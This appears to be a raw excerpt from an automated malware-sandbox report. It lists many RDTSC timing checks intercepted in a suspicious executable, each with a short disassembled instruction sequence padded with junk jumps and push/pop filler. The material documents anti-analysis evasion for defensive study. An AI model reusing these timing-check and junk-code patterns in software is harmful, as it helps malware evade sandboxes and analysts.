              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB37C second address: 7BB386 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB386 second address: 7BB392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FCD7D2AFB06h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB392 second address: 7BB396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB7B9 second address: 7BB7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB7BF second address: 7BB7E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCD7C4F0DA5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BFAE4 second address: 7BFAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C171A second address: 7C1721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C36FC second address: 7C3731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB11h 0x00000009 jmp 00007FCD7D2AFB15h 0x0000000e popad 0x0000000f pushad 0x00000010 jng 00007FCD7D2AFB06h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C3731 second address: 7C3738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7DB second address: 6DB7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7DF second address: 6DB7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7F6 second address: 6DB80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB80F second address: 6DB813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50802E8 second address: 50802FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB11h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50802FD second address: 5080301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080301 second address: 5080325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FCD7D2AFB0Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCD7D2AFB0Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080325 second address: 508032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 508032B second address: 5080331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080331 second address: 5080335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080335 second address: 5080339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080339 second address: 508037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007FCD7C4F0DA2h 0x00000010 movzx esi, bx 0x00000013 pop edx 0x00000014 mov ecx, 5A27F3D3h 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCD7C4F0DA5h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 508037A second address: 508038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803C2 second address: 50803C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803C8 second address: 50803CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803CC second address: 50803EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0D9Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A05FB second address: 50A0601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0601 second address: 50A0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0605 second address: 50A066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FCD7D2AFB16h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov eax, 4267114Dh 0x00000019 push ecx 0x0000001a mov al, bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 mov al, dl 0x00000025 popad 0x00000026 mov dword ptr [esp], ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCD7D2AFB17h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A066A second address: 50A0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0670 second address: 50A0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0674 second address: 50A068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A068B second address: 50A068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A068F second address: 50A06E2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, BCC3h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FCD7C4F0DA9h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 call 00007FCD7C4F0D9Ch 0x00000018 mov dl, cl 0x0000001a pop ebx 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCD7C4F0DA5h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A06E2 second address: 50A0727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007FCD7D2AFB18h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007FCD7D2AFB10h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FCD7D2AFB0Ch 0x0000001d push esi 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0727 second address: 50A0797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCD7C4F0D9Dh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FCD7C4F0DA1h 0x0000000f jmp 00007FCD7C4F0D9Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FCD7C4F0D9Bh 0x00000020 xor eax, 224EE1FEh 0x00000026 jmp 00007FCD7C4F0DA9h 0x0000002b popfd 0x0000002c popad 0x0000002d push dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 mov esi, 6783385Bh 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07EF second address: 50A07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07F5 second address: 50A07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07F9 second address: 50A07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50901D3 second address: 50901D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50901D8 second address: 5090268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FCD7D2AFB15h 0x0000000a sbb si, 9256h 0x0000000f jmp 00007FCD7D2AFB11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FCD7D2AFB13h 0x00000022 add esi, 3846C38Eh 0x00000028 jmp 00007FCD7D2AFB19h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FCD7D2AFB10h 0x00000034 or esi, 4B9F0608h 0x0000003a jmp 00007FCD7D2AFB0Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090268 second address: 5090306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e pushfd 0x0000000f jmp 00007FCD7C4F0DA3h 0x00000014 jmp 00007FCD7C4F0DA3h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FCD7C4F0D9Bh 0x00000025 sbb si, 590Eh 0x0000002a jmp 00007FCD7C4F0DA9h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FCD7C4F0DA0h 0x00000036 or eax, 135FAF88h 0x0000003c jmp 00007FCD7C4F0D9Bh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090306 second address: 5090379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Fh 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bx, E494h 0x00000015 mov di, B600h 0x00000019 popad 0x0000001a sub esp, 2Ch 0x0000001d jmp 00007FCD7D2AFB0Fh 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FCD7D2AFB16h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FCD7D2AFB0Ch 0x00000032 or ecx, 799766A8h 0x00000038 jmp 00007FCD7D2AFB0Bh 0x0000003d popfd 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090379 second address: 509039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCD7C4F0DA8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509039E second address: 50903B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090436 second address: 509048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007FCD7C4F0DA7h 0x00000010 inc ebx 0x00000011 jmp 00007FCD7C4F0DA6h 0x00000016 test al, al 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop eax 0x0000001d mov si, dx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509048E second address: 5090494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090494 second address: 5090498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509052E second address: 5090534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090534 second address: 5090538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090538 second address: 50905D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FCD7D2AFB16h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCD7D2AFB11h 0x00000019 sub eax, 75DE7356h 0x0000001f jmp 00007FCD7D2AFB11h 0x00000024 popfd 0x00000025 call 00007FCD7D2AFB10h 0x0000002a call 00007FCD7D2AFB12h 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cx, bx 0x00000039 jmp 00007FCD7D2AFB0Fh 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090670 second address: 5090676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090676 second address: 50906B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCDEDC7D923h 0x0000000e jmp 00007FCD7D2AFB0Eh 0x00000013 mov ebx, dword ptr [ebp+08h] 0x00000016 jmp 00007FCD7D2AFB10h 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edx, 67317830h 0x00000026 mov dh, E7h 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906B3 second address: 50906F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FCD7C4F0DA4h 0x00000011 push eax 0x00000012 jmp 00007FCD7C4F0D9Bh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FCD7C4F0D9Ah 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906F7 second address: 50906FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906FB second address: 50906FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906FF second address: 5090705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090705 second address: 5090747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FCD7C4F0DA3h 0x00000014 sbb ecx, 24E3F2FEh 0x0000001a jmp 00007FCD7C4F0DA9h 0x0000001f popfd 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090747 second address: 50907B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, B49Dh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCD7D2AFB15h 0x00000013 sub eax, 72A1A7E6h 0x00000019 jmp 00007FCD7D2AFB11h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FCD7D2AFB11h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCD7D2AFB18h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50907B2 second address: 50907B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50907E8 second address: 5090805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090805 second address: 5090824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 616DC33Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCD7C4F0DA0h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090824 second address: 509001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCDEDC7D928h 0x0000000f xor eax, eax 0x00000011 jmp 00007FCD7D28923Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007FCD7D2AFC63h 0x00000029 call 00007FCD81E2CF8Dh 0x0000002e mov edi, edi 0x00000030 jmp 00007FCD7D2AFB15h 0x00000035 xchg eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 509001E second address: 5090022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090022 second address: 5090028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090028 second address: 50900CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCD7C4F0DA1h 0x00000011 adc ch, FFFFFFE6h 0x00000014 jmp 00007FCD7C4F0DA1h 0x00000019 popfd 0x0000001a mov edi, esi 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FCD7C4F0DA8h 0x00000025 and ecx, 5CEBE4B8h 0x0000002b jmp 00007FCD7C4F0D9Bh 0x00000030 popfd 0x00000031 jmp 00007FCD7C4F0DA8h 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a jmp 00007FCD7C4F0D9Eh 0x0000003f mov dx, si 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50900CC second address: 50900D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50900D0 second address: 50900D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 50900D4 second address: 50900DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 509018D second address: 5090193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090193 second address: 5090197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090197 second address: 509019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 509019B second address: 50901BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCD7D2AFB15h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090D0B second address: 5090D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090D11 second address: 5090DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 05A8A702h 0x00000011 pushfd 0x00000012 jmp 00007FCD7D2AFB13h 0x00000017 sub al, FFFFFFFEh 0x0000001a jmp 00007FCD7D2AFB19h 0x0000001f popfd 0x00000020 popad 0x00000021 movzx esi, di 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FCD7D2AFB13h 0x0000002b mov ebp, esp 0x0000002d jmp 00007FCD7D2AFB16h 0x00000032 cmp dword ptr [75AB459Ch], 05h 0x00000039 jmp 00007FCD7D2AFB10h 0x0000003e je 00007FCDEDC6D761h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FCD7D2AFB0Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 5090DB8 second address: 5090DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
